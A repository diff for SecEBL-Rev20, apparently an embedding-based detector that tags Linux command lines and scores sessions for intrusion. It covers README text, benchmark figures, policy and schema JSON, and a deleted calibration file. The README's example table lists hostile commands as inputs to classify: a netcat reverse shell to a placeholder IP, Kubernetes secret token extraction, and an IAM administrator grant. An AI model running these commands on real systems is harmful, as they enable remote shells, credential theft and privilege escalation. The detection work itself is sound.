| 335 |
+
## Example Outputs
|
| 336 |
+
|
| 337 |
+
These examples show the user-facing L1 output style. Scores are cosine/retrieval
|
| 338 |
+
scores after the release prompt profile. The public helper scripts save top
|
| 339 |
+
labels in `predictions.jsonl`.
|
| 340 |
+
|
| 341 |
+
| Event | Top 3 L1 tags | Note |
|
| 342 |
+
| --- | --- | --- |
|
| 343 |
+
| `nc -e /bin/sh 203.0.113.10 4444` | <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 | `-e` is recognized as reverse-shell execution. |
|
| 344 |
+
| `nc -v 203.0.113.10 443` | <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 | Connection intent ranks above shell-spawn intent. |
|
| 345 |
+
| `cat /root/install.log` | <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 | Log-read semantics dominate. |
|
| 346 |
+
| `cat /root/install.conf` | <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 | Config-read semantics dominate. |
|
| 347 |
+
| `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 | K8s secret extraction and decoding. |
|
| 348 |
+
| `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 | Cloud privilege escalation semantics. |
|
| 349 |
+
| `curl -fsS http://127.0.0.1:8080/healthz` | <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 | Local service health check. |
|
| 350 |
+
|
| 351 |
+
## Runtime Performance
|
| 352 |
+
|
| 353 |
+
SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
|
| 354 |
+
tag definitions. The serving path embeds the event, embeds or loads tag
|
| 355 |
+
definition embeddings, then ranks tags by similarity.
|
| 356 |
+
|
| 357 |
+
Current single-card CUDA recommendation:
|
| 358 |
+
|
| 359 |
+
| Setting | Value |
|
| 360 |
+
| --- | --- |
|
| 361 |
+
| Precision | FP16 |
|
| 362 |
+
| Attention | SDPA |
|
| 363 |
+
| `max_seq_length` | 160 |
|
| 364 |
+
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
|
| 365 |
+
| Sorting | `sort_by=char` |
|
| 366 |
+
| Padding | dynamic, no forced pad alignment |
|
| 367 |
+
| Output path | GPU tensor output plus GPU top-k |
|
| 368 |
+
|
| 369 |
+
Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:
|
| 370 |
+
|
| 371 |
+
| Mode | Throughput |
|
| 372 |
+
| --- | ---: |
|
| 373 |
+
| Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s |
|
| 374 |
+
| Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline |
|
| 375 |
+
| `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
|
| 376 |
+
| Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s |
|
| 377 |
+
|
| 378 |
+
Exact raw-event cache lookup was measured separately at mean 1,817,462.76
|
| 379 |
+
rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
|
| 380 |
|
| 381 |
## L2 Artifact
|
| 382 |
|
|
|
|
| 384 |
companion GitHub `scripts/run_examples.sh` can run the public Linux example
|
| 385 |
sessions end to end when this model directory is used as `MODEL_DIR`.
|
| 386 |
|
| 387 |
+
In this release, a **session** is a sequence of events grouped by `session_id`.
|
| 388 |
+
L1 labels each event independently. L2 scores the whole session by aggregating
|
| 389 |
+
cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
|
| 390 |
+
and routine-operation context. The L2 output is a session-level verdict such as
|
| 391 |
+
`intrusion` or `normal_operation`, not a replacement for per-command behavior
|
| 392 |
+
tags.
|
| 393 |
+
|
| 394 |
+
For compatibility with the released L2 artifact, L2 derives its session
|
| 395 |
+
features from cached L1 `top_labels` using an internal selected-tag feature
|
| 396 |
+
path. In plain terms, L2 filters the cached ranked labels inside its own feature
|
| 397 |
+
builder before session scoring. This does not change L1 prediction output:
|
| 398 |
+
users still receive ranked `top_labels`, not a selected `behavior_tags` field.
|
| 399 |
+
|
| 400 |
+
Runtime L2 does not use raw command text, user names, host names, or session ids
|
| 401 |
+
as scoring features. Session ids may appear in private data-prep workflows for
|
| 402 |
+
label assignment, but they are not runtime allow/deny lists.
|
| 403 |
|
| 404 |
Internal L2 summary:
|
| 405 |
|
| 406 |
| Check | Result |
|
| 407 |
| --- | ---: |
|
| 408 |
+
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
|
| 409 |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
|
| 410 |
+
| OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
|
| 411 |
|
| 412 |
The 7M pressure-stream result was measured on real background telemetry plus
|
| 413 |
embedded synthetic attack sessions. The underlying rows and real session
|
| 414 |
+
identifiers are not redistributed. The included L2 artifact is a
|
| 415 |
+
research/reproducibility component, not a general production IDS claim.
|
| 416 |
|
| 417 |
+
## Direct SentenceTransformers Loading
|
| 418 |
|
| 419 |
+
You can load the embedding model directly:
|
| 420 |
|
| 421 |
```python
|
| 422 |
from sentence_transformers import SentenceTransformer
|
|
|
|
| 424 |
model = SentenceTransformer("willchen0011/SecEBL")
|
| 425 |
```
|
| 426 |
|
| 427 |
+
Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
|
| 428 |
+
encode the event, encode or load the Rev20 semantic label texts from
|
| 429 |
+
`semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
|
| 430 |
+
labels. For normal use, prefer the companion GitHub helpers because they keep
|
| 431 |
+
the prompt profile, semantic text loading, top-k output format, and optional L2
|
| 432 |
+
feature path aligned with this release.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 433 |
|
| 434 |
## Intended Use
|
| 435 |
|
|
|
|
| 437 |
- Internal security detection, investigation, and triage for systems an
|
| 438 |
organization owns, operates, administers, or is explicitly authorized to
|
| 439 |
defend.
|
| 440 |
+
- Building session-level risk scoring over SecEBL behavior-label streams.
|
| 441 |
|
| 442 |
## Out Of Scope
|
| 443 |
|
|
|
|
| 450 |
## License
|
| 451 |
|
| 452 |
The model artifacts are released under **SecEBL Model License 1.0**. This is an
|
| 453 |
+
open-weight restricted-use model license, not Apache-2.0 and not an
|
| 454 |
+
OSI-approved open source license.
|
| 455 |
|
| 456 |
The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
|
| 457 |
Source code, schemas, public examples, and helper scripts in the companion
|
l2_artifacts/README.md
CHANGED
|
@@ -5,45 +5,47 @@ It is included so the companion GitHub `scripts/run_examples.sh` can run public
|
|
| 5 |
Linux example-session scoring by default when this Hugging Face model snapshot
|
| 6 |
is used as `MODEL_DIR`.
|
| 7 |
|
| 8 |
-
Run tags:
|
| 9 |
-
|
| 10 |
-
```text
|
| 11 |
-
L1: featurize-rev20-20260620-072423-ep128-bs112-latestdata
|
| 12 |
-
L2: featurize-rev20-20260620-072423-ep128-bs112-latestdata-l2hn27-lenctx-semcal-20260621
|
| 13 |
-
```
|
| 14 |
-
|
| 15 |
## Files
|
| 16 |
|
| 17 |
| Path | Purpose |
|
| 18 |
| --- | --- |
|
| 19 |
| `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
|
| 20 |
-
| `tag_risk_policy.rev20.json` | Matching tag-selection
|
| 21 |
| `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
|
| 22 |
|
| 23 |
The release does not include the L2 training JSONL, raw pressure-stream archive,
|
| 24 |
-
full
|
| 25 |
copies, or private run logs. Use the companion GitHub repository for source
|
| 26 |
code and public example data.
|
| 27 |
|
| 28 |
## Scope
|
| 29 |
|
| 30 |
-
L2
|
| 31 |
-
|
| 32 |
-
|
|
|
|
| 33 |
|
| 34 |
Runtime L2 does not use raw command text, user names, host names, or session ids
|
| 35 |
as scoring features. Session ids may appear in private data-prep workflows for
|
| 36 |
label assignment, but they are not runtime allow/deny lists.
|
| 37 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 38 |
## Public Summary
|
| 39 |
|
| 40 |
| Check | Result |
|
| 41 |
| --- | ---: |
|
| 42 |
-
| Fitted withheld Linux
|
| 43 |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
|
| 44 |
| OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
|
| 45 |
|
| 46 |
-
The high
|
| 47 |
experiment. It is evidence that this L2 setup works well on the current complex
|
| 48 |
internal benchmark and pressure-data fit-check, not an independent claim of
|
| 49 |
general production IDS accuracy.
|
|
|
|
|
|
|
|
|
|
|
|
| 5 |
Linux example-session scoring by default when this Hugging Face model snapshot
|
| 6 |
is used as `MODEL_DIR`.
|
| 7 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 8 |
## Files
|
| 9 |
|
| 10 |
| Path | Purpose |
|
| 11 |
| --- | --- |
|
| 12 |
| `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
|
| 13 |
+
| `tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
|
| 14 |
| `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
|
| 15 |
|
| 16 |
The release does not include the L2 training JSONL, raw pressure-stream archive,
|
| 17 |
+
full internal sessions, per-session pressure results, alert JSONL, source-code
|
| 18 |
copies, or private run logs. Use the companion GitHub repository for source
|
| 19 |
code and public example data.
|
| 20 |
|
| 21 |
## Scope
|
| 22 |
|
| 23 |
+
L2 is an experimental session scorer. A session is a sequence of events grouped
|
| 24 |
+
by `session_id`. L1 labels each event independently; L2 scores the whole session
|
| 25 |
+
by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior
|
| 26 |
+
transitions, and routine-operation context.
|
| 27 |
|
| 28 |
Runtime L2 does not use raw command text, user names, host names, or session ids
|
| 29 |
as scoring features. Session ids may appear in private data-prep workflows for
|
| 30 |
label assignment, but they are not runtime allow/deny lists.
|
| 31 |
|
| 32 |
+
For compatibility with the released L2 artifact, L2 derives its session
|
| 33 |
+
features from cached L1 `top_labels` using an internal selected-tag feature
|
| 34 |
+
path. This does not change L1 prediction output: users still receive ranked
|
| 35 |
+
`top_labels`, not a selected `behavior_tags` field.
|
| 36 |
+
|
| 37 |
## Public Summary
|
| 38 |
|
| 39 |
| Check | Result |
|
| 40 |
| --- | ---: |
|
| 41 |
+
| Fitted withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
|
| 42 |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
|
| 43 |
| OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
|
| 44 |
|
| 45 |
+
The high session benchmark accuracy is scoped to the current fitted internal
|
| 46 |
experiment. It is evidence that this L2 setup works well on the current complex
|
| 47 |
internal benchmark and pressure-data fit-check, not an independent claim of
|
| 48 |
general production IDS accuracy.
|
| 49 |
+
|
| 50 |
+
Use the companion GitHub helpers so feature extraction matches the released L2
|
| 51 |
+
artifact.
|
l2_artifacts/tag_risk_policy.rev20.json
CHANGED
|
@@ -66,11 +66,10 @@
|
|
| 66 |
"family": "persistence"
|
| 67 |
}
|
| 68 |
},
|
| 69 |
-
"global_score_floor": 0.45,
|
| 70 |
"max_tags_per_command": 4,
|
| 71 |
"min_tag_score": 0.55,
|
| 72 |
"multi_label_gap": 0.12,
|
| 73 |
-
"notes": "Rev20 flat behavior-tag session risk policy. L1
|
| 74 |
"operational_context_markers": [
|
| 75 |
"cloud_identity",
|
| 76 |
"identity_policy",
|
|
|
|
| 66 |
"family": "persistence"
|
| 67 |
}
|
| 68 |
},
|
|
|
|
| 69 |
"max_tags_per_command": 4,
|
| 70 |
"min_tag_score": 0.55,
|
| 71 |
"multi_label_gap": 0.12,
|
| 72 |
+
"notes": "Rev20 flat behavior-tag session risk policy. L2 derives session features from cached L1 top_labels using an internal tag-selection path that matches the released L2 model artifact. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field. Tag-level points describe intrinsic behavior risk; session-level aggregation combines evidence, diversity, routine maintenance, and professional operations context. scoring_professional_operations is a negative context signal only when professional tags are dominant, anchor evidence is present, explicit attacks are absent, and non-professional hard attack markers are absent. It is not a command or tag whitelist.",
|
| 73 |
"operational_context_markers": [
|
| 74 |
"cloud_identity",
|
| 75 |
"identity_policy",
|
l2_artifacts/train_summary.json
CHANGED
|
@@ -1,7 +1,7 @@
|
|
| 1 |
{
|
| 2 |
"schema": "secebl_rev20_l2_public_summary_v1",
|
| 3 |
-
"
|
| 4 |
-
"
|
| 5 |
"model_type": "logistic_regression_session_scorer",
|
| 6 |
"scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
|
| 7 |
"runtime_feature_exclusions": [
|
|
@@ -30,7 +30,7 @@
|
|
| 30 |
"fp": 15,
|
| 31 |
"tn": 5306
|
| 32 |
},
|
| 33 |
-
"
|
| 34 |
"sessions": 663,
|
| 35 |
"rows_seen": 12594,
|
| 36 |
"attack_sessions": 365,
|
|
|
|
| 1 |
{
|
| 2 |
"schema": "secebl_rev20_l2_public_summary_v1",
|
| 3 |
+
"l1_release": "SecEBL-Rev20 public L1 release",
|
| 4 |
+
"l2_release": "SecEBL-Rev20 public L2 artifact",
|
| 5 |
"model_type": "logistic_regression_session_scorer",
|
| 6 |
"scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
|
| 7 |
"runtime_feature_exclusions": [
|
|
|
|
| 30 |
"fp": 15,
|
| 31 |
"tn": 5306
|
| 32 |
},
|
| 33 |
+
"withheld_session_benchmark_fit_check": {
|
| 34 |
"sessions": 663,
|
| 35 |
"rows_seen": 12594,
|
| 36 |
"attack_sessions": 365,
|
schema/tags_schema_rev20.json
CHANGED
|
@@ -4,13 +4,13 @@
|
|
| 4 |
"vocabulary_revision": 20,
|
| 5 |
"status": "draft_pending_manual_reverse_review",
|
| 6 |
"purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
|
| 7 |
-
"
|
| 8 |
"behavior_tags": [
|
| 9 |
"zero or more visible complete behavior labels"
|
| 10 |
]
|
| 11 |
},
|
| 12 |
"invariants": [
|
| 13 |
-
"
|
| 14 |
"Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
|
| 15 |
"Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
|
| 16 |
"Emit the most-specific applicable behavior and suppress its generic parent behavior.",
|
|
|
|
| 4 |
"vocabulary_revision": 20,
|
| 5 |
"status": "draft_pending_manual_reverse_review",
|
| 6 |
"purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
|
| 7 |
+
"label_row_schema": {
|
| 8 |
"behavior_tags": [
|
| 9 |
"zero or more visible complete behavior labels"
|
| 10 |
]
|
| 11 |
},
|
| 12 |
"invariants": [
|
| 13 |
+
"Training and evaluation label rows use one flat behavior_tags array; prediction output exposes ranked top_labels.",
|
| 14 |
"Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
|
| 15 |
"Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
|
| 16 |
"Emit the most-specific applicable behavior and suppress its generic parent behavior.",
|
score_calibration.rev20.json
DELETED
|
@@ -1,1891 +0,0 @@
|
|
| 1 |
-
{
|
| 2 |
-
"axis_thresholds": {
|
| 3 |
-
"cloud_control_plane": {
|
| 4 |
-
"threshold": 0.6849,
|
| 5 |
-
"tp_p50": 0.7858,
|
| 6 |
-
"tp_samples": 3877
|
| 7 |
-
},
|
| 8 |
-
"configuration_and_log_modification": {
|
| 9 |
-
"threshold": 0.5729,
|
| 10 |
-
"tp_p50": 0.7522,
|
| 11 |
-
"tp_samples": 3377
|
| 12 |
-
},
|
| 13 |
-
"containers_and_cloud_native": {
|
| 14 |
-
"threshold": 0.6272,
|
| 15 |
-
"tp_p50": 0.7672,
|
| 16 |
-
"tp_samples": 7405
|
| 17 |
-
},
|
| 18 |
-
"database_and_infrastructure_services": {
|
| 19 |
-
"threshold": 0.6013,
|
| 20 |
-
"tp_p50": 0.7376,
|
| 21 |
-
"tp_samples": 10039
|
| 22 |
-
},
|
| 23 |
-
"execution_and_process": {
|
| 24 |
-
"threshold": 0.5419,
|
| 25 |
-
"tp_p50": 0.6715,
|
| 26 |
-
"tp_samples": 8078
|
| 27 |
-
},
|
| 28 |
-
"filesystem_and_data": {
|
| 29 |
-
"threshold": 0.4651,
|
| 30 |
-
"tp_p50": 0.5904,
|
| 31 |
-
"tp_samples": 15305
|
| 32 |
-
},
|
| 33 |
-
"identity_auth_and_secrets": {
|
| 34 |
-
"threshold": 0.6071,
|
| 35 |
-
"tp_p50": 0.7482,
|
| 36 |
-
"tp_samples": 5560
|
| 37 |
-
},
|
| 38 |
-
"kernel_memory_and_tracing": {
|
| 39 |
-
"threshold": 0.6668,
|
| 40 |
-
"tp_p50": 0.7787,
|
| 41 |
-
"tp_samples": 1768
|
| 42 |
-
},
|
| 43 |
-
"network": {
|
| 44 |
-
"threshold": 0.541,
|
| 45 |
-
"tp_p50": 0.6974,
|
| 46 |
-
"tp_samples": 20337
|
| 47 |
-
},
|
| 48 |
-
"observation_and_discovery": {
|
| 49 |
-
"threshold": 0.5103,
|
| 50 |
-
"tp_p50": 0.6811,
|
| 51 |
-
"tp_samples": 29944
|
| 52 |
-
},
|
| 53 |
-
"package_build_and_source": {
|
| 54 |
-
"threshold": 0.6235,
|
| 55 |
-
"tp_p50": 0.7606,
|
| 56 |
-
"tp_samples": 5751
|
| 57 |
-
},
|
| 58 |
-
"persistence_services_and_storage": {
|
| 59 |
-
"threshold": 0.6133,
|
| 60 |
-
"tp_p50": 0.7706,
|
| 61 |
-
"tp_samples": 5651
|
| 62 |
-
}
|
| 63 |
-
},
|
| 64 |
-
"counts": {
|
| 65 |
-
"eval_rows": 82895,
|
| 66 |
-
"labels_with_threshold": 361,
|
| 67 |
-
"semantic_labels": 361,
|
| 68 |
-
"sparse_labels": 0,
|
| 69 |
-
"tp_observations": 117092
|
| 70 |
-
},
|
| 71 |
-
"default_threshold": 0.531,
|
| 72 |
-
"global_floor": 0.45,
|
| 73 |
-
"label_thresholds": {
|
| 74 |
-
"append_system_log": {
|
| 75 |
-
"threshold": 0.5597,
|
| 76 |
-
"tp_p50": 0.7486,
|
| 77 |
-
"tp_samples": 609
|
| 78 |
-
},
|
| 79 |
-
"apply_infrastructure_template": {
|
| 80 |
-
"threshold": 0.6683,
|
| 81 |
-
"tp_p50": 0.7477,
|
| 82 |
-
"tp_samples": 139
|
| 83 |
-
},
|
| 84 |
-
"archive_sensitive_content": {
|
| 85 |
-
"threshold": 0.5092,
|
| 86 |
-
"tp_p50": 0.5666,
|
| 87 |
-
"tp_samples": 592
|
| 88 |
-
},
|
| 89 |
-
"attach_multiplexer_session": {
|
| 90 |
-
"threshold": 0.7399,
|
| 91 |
-
"tp_p50": 0.8292,
|
| 92 |
-
"tp_samples": 102
|
| 93 |
-
},
|
| 94 |
-
"attach_process_debugger": {
|
| 95 |
-
"threshold": 0.6326,
|
| 96 |
-
"tp_p50": 0.71,
|
| 97 |
-
"tp_samples": 248
|
| 98 |
-
},
|
| 99 |
-
"attempt_remote_authentication": {
|
| 100 |
-
"threshold": 0.5069,
|
| 101 |
-
"tp_p50": 0.5863,
|
| 102 |
-
"tp_samples": 631
|
| 103 |
-
},
|
| 104 |
-
"authenticate_cloud_cli": {
|
| 105 |
-
"threshold": 0.6809,
|
| 106 |
-
"tp_p50": 0.7282,
|
| 107 |
-
"tp_samples": 123
|
| 108 |
-
},
|
| 109 |
-
"build_container_image": {
|
| 110 |
-
"threshold": 0.639,
|
| 111 |
-
"tp_p50": 0.7632,
|
| 112 |
-
"tp_samples": 261
|
| 113 |
-
},
|
| 114 |
-
"build_source_code": {
|
| 115 |
-
"threshold": 0.5956,
|
| 116 |
-
"tp_p50": 0.7638,
|
| 117 |
-
"tp_samples": 980
|
| 118 |
-
},
|
| 119 |
-
"capture_network_flows": {
|
| 120 |
-
"threshold": 0.7264,
|
| 121 |
-
"tp_p50": 0.7795,
|
| 122 |
-
"tp_samples": 113
|
| 123 |
-
},
|
| 124 |
-
"capture_network_packets": {
|
| 125 |
-
"threshold": 0.6213,
|
| 126 |
-
"tp_p50": 0.8106,
|
| 127 |
-
"tp_samples": 283
|
| 128 |
-
},
|
| 129 |
-
"capture_process_memory": {
|
| 130 |
-
"threshold": 0.7009,
|
| 131 |
-
"tp_p50": 0.802,
|
| 132 |
-
"tp_samples": 146
|
| 133 |
-
},
|
| 134 |
-
"capture_process_state": {
|
| 135 |
-
"threshold": 0.6364,
|
| 136 |
-
"tp_p50": 0.7099,
|
| 137 |
-
"tp_samples": 227
|
| 138 |
-
},
|
| 139 |
-
"change_file_ownership": {
|
| 140 |
-
"threshold": 0.6687,
|
| 141 |
-
"tp_p50": 0.8016,
|
| 142 |
-
"tp_samples": 184
|
| 143 |
-
},
|
| 144 |
-
"change_password": {
|
| 145 |
-
"threshold": 0.6503,
|
| 146 |
-
"tp_p50": 0.7162,
|
| 147 |
-
"tp_samples": 134
|
| 148 |
-
},
|
| 149 |
-
"clear_login_history": {
|
| 150 |
-
"threshold": 0.692,
|
| 151 |
-
"tp_p50": 0.7781,
|
| 152 |
-
"tp_samples": 106
|
| 153 |
-
},
|
| 154 |
-
"clear_shell_history": {
|
| 155 |
-
"threshold": 0.6478,
|
| 156 |
-
"tp_p50": 0.7663,
|
| 157 |
-
"tp_samples": 132
|
| 158 |
-
},
|
| 159 |
-
"clone_source_repository": {
|
| 160 |
-
"threshold": 0.6837,
|
| 161 |
-
"tp_p50": 0.8069,
|
| 162 |
-
"tp_samples": 130
|
| 163 |
-
},
|
| 164 |
-
"compress_data": {
|
| 165 |
-
"threshold": 0.5834,
|
| 166 |
-
"tp_p50": 0.6926,
|
| 167 |
-
"tp_samples": 430
|
| 168 |
-
},
|
| 169 |
-
"configure_cloud_cli": {
|
| 170 |
-
"threshold": 0.657,
|
| 171 |
-
"tp_p50": 0.7533,
|
| 172 |
-
"tp_samples": 127
|
| 173 |
-
},
|
| 174 |
-
"connect_cloud_database": {
|
| 175 |
-
"threshold": 0.7249,
|
| 176 |
-
"tp_p50": 0.8119,
|
| 177 |
-
"tp_samples": 109
|
| 178 |
-
},
|
| 179 |
-
"connect_external_service": {
|
| 180 |
-
"threshold": 0.5224,
|
| 181 |
-
"tp_p50": 0.6528,
|
| 182 |
-
"tp_samples": 400
|
| 183 |
-
},
|
| 184 |
-
"connect_internal_service": {
|
| 185 |
-
"threshold": 0.5129,
|
| 186 |
-
"tp_p50": 0.6238,
|
| 187 |
-
"tp_samples": 868
|
| 188 |
-
},
|
| 189 |
-
"connect_local_service": {
|
| 190 |
-
"threshold": 0.5749,
|
| 191 |
-
"tp_p50": 0.6629,
|
| 192 |
-
"tp_samples": 173
|
| 193 |
-
},
|
| 194 |
-
"connect_mail_server": {
|
| 195 |
-
"threshold": 0.6892,
|
| 196 |
-
"tp_p50": 0.7791,
|
| 197 |
-
"tp_samples": 124
|
| 198 |
-
},
|
| 199 |
-
"consume_message": {
|
| 200 |
-
"threshold": 0.6451,
|
| 201 |
-
"tp_p50": 0.7776,
|
| 202 |
-
"tp_samples": 164
|
| 203 |
-
},
|
| 204 |
-
"crack_credential_material": {
|
| 205 |
-
"threshold": 0.6732,
|
| 206 |
-
"tp_p50": 0.7608,
|
| 207 |
-
"tp_samples": 113
|
| 208 |
-
},
|
| 209 |
-
"create_access_token": {
|
| 210 |
-
"threshold": 0.5892,
|
| 211 |
-
"tp_p50": 0.6797,
|
| 212 |
-
"tp_samples": 203
|
| 213 |
-
},
|
| 214 |
-
"create_archive": {
|
| 215 |
-
"threshold": 0.4903,
|
| 216 |
-
"tp_p50": 0.5582,
|
| 217 |
-
"tp_samples": 1240
|
| 218 |
-
},
|
| 219 |
-
"create_cloud_access_key": {
|
| 220 |
-
"threshold": 0.6997,
|
| 221 |
-
"tp_p50": 0.8081,
|
| 222 |
-
"tp_samples": 143
|
| 223 |
-
},
|
| 224 |
-
"create_cloud_compute": {
|
| 225 |
-
"threshold": 0.76,
|
| 226 |
-
"tp_p50": 0.8079,
|
| 227 |
-
"tp_samples": 109
|
| 228 |
-
},
|
| 229 |
-
"create_cloud_identity": {
|
| 230 |
-
"threshold": 0.6934,
|
| 231 |
-
"tp_p50": 0.8043,
|
| 232 |
-
"tp_samples": 125
|
| 233 |
-
},
|
| 234 |
-
"create_cloud_resource": {
|
| 235 |
-
"threshold": 0.6841,
|
| 236 |
-
"tp_p50": 0.7385,
|
| 237 |
-
"tp_samples": 102
|
| 238 |
-
},
|
| 239 |
-
"create_cluster_identity": {
|
| 240 |
-
"threshold": 0.7239,
|
| 241 |
-
"tp_p50": 0.7737,
|
| 242 |
-
"tp_samples": 119
|
| 243 |
-
},
|
| 244 |
-
"create_cluster_secret": {
|
| 245 |
-
"threshold": 0.6945,
|
| 246 |
-
"tp_p50": 0.8116,
|
| 247 |
-
"tp_samples": 140
|
| 248 |
-
},
|
| 249 |
-
"create_container_pod": {
|
| 250 |
-
"threshold": 0.5728,
|
| 251 |
-
"tp_p50": 0.6787,
|
| 252 |
-
"tp_samples": 238
|
| 253 |
-
},
|
| 254 |
-
"create_credential_material": {
|
| 255 |
-
"threshold": 0.5511,
|
| 256 |
-
"tp_p50": 0.6301,
|
| 257 |
-
"tp_samples": 504
|
| 258 |
-
},
|
| 259 |
-
"create_database": {
|
| 260 |
-
"threshold": 0.7242,
|
| 261 |
-
"tp_p50": 0.8347,
|
| 262 |
-
"tp_samples": 116
|
| 263 |
-
},
|
| 264 |
-
"create_dynamic_proxy": {
|
| 265 |
-
"threshold": 0.6547,
|
| 266 |
-
"tp_p50": 0.8056,
|
| 267 |
-
"tp_samples": 130
|
| 268 |
-
},
|
| 269 |
-
"create_forward_tunnel": {
|
| 270 |
-
"threshold": 0.6512,
|
| 271 |
-
"tp_p50": 0.7743,
|
| 272 |
-
"tp_samples": 213
|
| 273 |
-
},
|
| 274 |
-
"create_local_kubernetes_cluster": {
|
| 275 |
-
"threshold": 0.7144,
|
| 276 |
-
"tp_p50": 0.7761,
|
| 277 |
-
"tp_samples": 127
|
| 278 |
-
},
|
| 279 |
-
"create_multiplexer_session": {
|
| 280 |
-
"threshold": 0.6507,
|
| 281 |
-
"tp_p50": 0.7863,
|
| 282 |
-
"tp_samples": 115
|
| 283 |
-
},
|
| 284 |
-
"create_privileged_container": {
|
| 285 |
-
"threshold": 0.5842,
|
| 286 |
-
"tp_p50": 0.6388,
|
| 287 |
-
"tp_samples": 136
|
| 288 |
-
},
|
| 289 |
-
"create_reverse_tunnel": {
|
| 290 |
-
"threshold": 0.6474,
|
| 291 |
-
"tp_p50": 0.7795,
|
| 292 |
-
"tp_samples": 195
|
| 293 |
-
},
|
| 294 |
-
"create_scheduled_task": {
|
| 295 |
-
"threshold": 0.6437,
|
| 296 |
-
"tp_p50": 0.7858,
|
| 297 |
-
"tp_samples": 435
|
| 298 |
-
},
|
| 299 |
-
"create_special_filesystem_node": {
|
| 300 |
-
"threshold": 0.6502,
|
| 301 |
-
"tp_p50": 0.7319,
|
| 302 |
-
"tp_samples": 127
|
| 303 |
-
},
|
| 304 |
-
"create_ssh_key": {
|
| 305 |
-
"threshold": 0.6914,
|
| 306 |
-
"tp_p50": 0.7923,
|
| 307 |
-
"tp_samples": 125
|
| 308 |
-
},
|
| 309 |
-
"create_startup_script": {
|
| 310 |
-
"threshold": 0.6812,
|
| 311 |
-
"tp_p50": 0.7888,
|
| 312 |
-
"tp_samples": 108
|
| 313 |
-
},
|
| 314 |
-
"create_systemd_unit": {
|
| 315 |
-
"threshold": 0.6508,
|
| 316 |
-
"tp_p50": 0.8192,
|
| 317 |
-
"tp_samples": 242
|
| 318 |
-
},
|
| 319 |
-
"create_user": {
|
| 320 |
-
"threshold": 0.6809,
|
| 321 |
-
"tp_p50": 0.8211,
|
| 322 |
-
"tp_samples": 167
|
| 323 |
-
},
|
| 324 |
-
"decode_data": {
|
| 325 |
-
"threshold": 0.5974,
|
| 326 |
-
"tp_p50": 0.6861,
|
| 327 |
-
"tp_samples": 194
|
| 328 |
-
},
|
| 329 |
-
"decrease_file_permission": {
|
| 330 |
-
"threshold": 0.6328,
|
| 331 |
-
"tp_p50": 0.8114,
|
| 332 |
-
"tp_samples": 134
|
| 333 |
-
},
|
| 334 |
-
"decrypt_data": {
|
| 335 |
-
"threshold": 0.6147,
|
| 336 |
-
"tp_p50": 0.7404,
|
| 337 |
-
"tp_samples": 142
|
| 338 |
-
},
|
| 339 |
-
"delete_audit_log": {
|
| 340 |
-
"threshold": 0.6353,
|
| 341 |
-
"tp_p50": 0.7633,
|
| 342 |
-
"tp_samples": 179
|
| 343 |
-
},
|
| 344 |
-
"delete_business_log": {
|
| 345 |
-
"threshold": 0.73,
|
| 346 |
-
"tp_p50": 0.8098,
|
| 347 |
